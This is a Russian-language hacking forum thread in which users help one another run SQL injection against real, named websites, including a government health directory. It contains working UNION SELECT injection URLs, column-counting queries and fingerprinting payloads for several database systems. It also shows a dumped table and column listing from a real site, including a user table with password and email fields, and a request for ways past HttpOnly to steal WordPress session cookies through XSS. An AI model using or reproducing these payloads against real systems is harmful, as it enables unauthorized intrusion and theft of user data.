Читал, пробовал разные варианты Code: http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+and+1=-1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+MSysObjects Не получается вывести диагностические ошибки о правильности или неправильности
Всем привет! Подскажите, по какой причине может передаваться не вся кука? Всякий хлам из нее доходит, а вот ключа с сессией пользователя нет. add: На сайте wordpress 3.1.3... xss в форуме(плагин для wp). Еще попробовал в адрессной строке просмотреть алертом... тоже самое... без нужного значения. Опера показывает все, и еще на нужной записи стоит флаг HttpOnly, на остальных нет.
Да, уже погуглил. Что-то еще можно сделать?.. как-то убрать этот флаг? add: нашел ява апплет... всем спасибо))
cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
В какую сторону раскручивать? Code: http://www.homesrochester.com/index.cfm?PageID=1 пробовал как mssql, не выходит
Крутить нужно как проведение SQL инъекций в Microsoft Access: http://forum.antichat.ru/thread50550.html но навряд ли ты ее раскрутишь
Вы правы, там все легко выводится: DB Name: hr Table found: sysdiagrams Table found: Process Table found: MLSArea Table found: ProcessStep Table found: FileImport Table found: User Table found: Theme Table found: MLSListingImage Table found: Agent Table found: MLSListing Table found: Office Table found: Table1 Table found: Table2 Table found: ContainerModule Table found: ListingPriceHistory Table found: PageContainer Table found: Portlet Table found: OpenHouse Table found: PortletProperty Table found: ModuleProperty Table found: PropertyType Table found: Page Table found: FeaturedListing Table found: UserSearch Table found: FileImportColumn Table found: ListingType Table found: Document Table found: MLSListingLink Table found: WebLog Table found: Container Table found: OpenHouseTemp Table found: Module Table found: State Table found: Website hr.User Column found: AddedByID Column found: AddedDt Column found: EmailAddress Column found: FirstName Column found: HomePhone Column found: LastName Column found: MobilePhone Column found: Password Column found: SysAdminFl Column found: UpdatedByID Column found: UpdatedDt Column found: UserID Column found: UserName Column found: UserStatus Column found: WorkPhone От меня ++++++++ и большое thanks за науку.
2 вопроса: 1 - имеется сайт, в нем Возможно есть sql inj пишу в урл 49-1 возвращается 48 страница при написании ' выводится пустая страница как осуществить подсчет полей и дамп базы в таких условиях? и уязвим вообще этот сайт? 2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
1. Если параметр полностью передаться в базу, то как обычно. Обычно числовые параметры не обрамляются кавычками, из за этого при проведении инъекции возможно исключить этот символ. Если нет - выложи линк. Всё надо смотреть, так же возможно из переменной удаляются символы(A-Za-z), специальные функции - здесь телепатов нет. 2. Встроенными функциями, синтаксисом подзапросов, сравнения - потом БД гораздо больше.
MySQL Code: id=1+procedure+analyse() id=1+and+concat_ws(1)=1 id=1+and+connection_id()=connection_id() MSSQL Code: id=1+and+len(@@version)=len(@@version) id=1+and+(@@TEXTSIZE>@@LANGID) PostgerSQL Code: id=1+and+1=1::int id=1+and+pg_backend_pid()=pg_backend_pid() id=1+and+5432=inet_server_port() Access Code: id=1+and+1=StrConv(1,1) id=1+and+Sgn(1)=Sgn(1) Oracle Code: id=1+and+to_char(22)=to_char(2)||to_char(2) id=1+and+instr4(1,1,1,1)=1 id=1+and+rownum=rownum Взято отсюда: https://rdot.org/forum/showpost.php?p=695&postcount=1
Code: http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 64-- - http://www.cms.it/prodotti.php?lang=eng&pc=49 order by 65-- - Code: http://www.cms.it/prodotti.php?lang=eng&pc=(49)union/**/select(1),2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- - вывод внизу
http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+ Сейчас видишь? В админку все равно не попасть
http://h1813090.stratoserver.net/files/share/8_6_2011/sraB8DgFlEWFYHrOQR1opw.jpg знаю я sqlhelperom уже просканил базу там даж паролей нет, просто руками же интересней
